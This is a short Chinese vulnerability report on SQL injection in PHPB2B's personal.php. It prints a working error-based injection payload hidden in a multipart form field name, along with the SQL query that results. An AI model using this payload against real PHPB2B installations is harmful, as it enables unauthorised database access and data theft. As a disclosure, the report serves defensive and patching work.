PHPB2B注入#2(绕过过滤)

漏洞作者: darker

PHPB2B某处注入#1。绕过过滤。 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。

详细说明:

POST /virtual-office/personal.php Content-Disposition: form-data; name="memberfield[first_name]" Content-Disposition: form-data; name="memberfield[last_name]" ... ... first_name,last_name,gender,address,zipcode,qq,icq,msn,yahoo,skype,tel,fax,mobile,site_url,area_id 等未过滤。 提交 Content-Disposition: form-data; name="memberfield[first_name FROM pb_thk_memberfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]" 执行: SELECT first_name FROM pb_thk_memberfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,last_name,gender,address,zipcode,qq,icq,msn,yahoo,skype,tel,fax,mobile,site_url,area_id FROM pb_thk_memberfields WHERE member_id='3'

漏洞证明:

本地开启debug。默认不开启,可延时注入。 25021853dc49f3f960cc38cfd6a216975669eeaf[1] 数据库日志。 25021951a6cc2493d7a014d8933e09f0f9a9934c[1]

发表评论